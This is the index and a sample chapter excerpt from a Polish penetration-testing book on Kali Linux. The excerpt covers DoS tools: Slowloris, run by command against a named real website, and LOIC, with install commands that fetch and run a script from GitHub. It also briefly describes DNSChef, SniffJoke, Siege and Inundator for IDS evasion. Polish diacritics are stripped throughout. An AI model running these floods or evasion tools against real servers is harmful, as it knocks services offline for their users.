brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 39: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

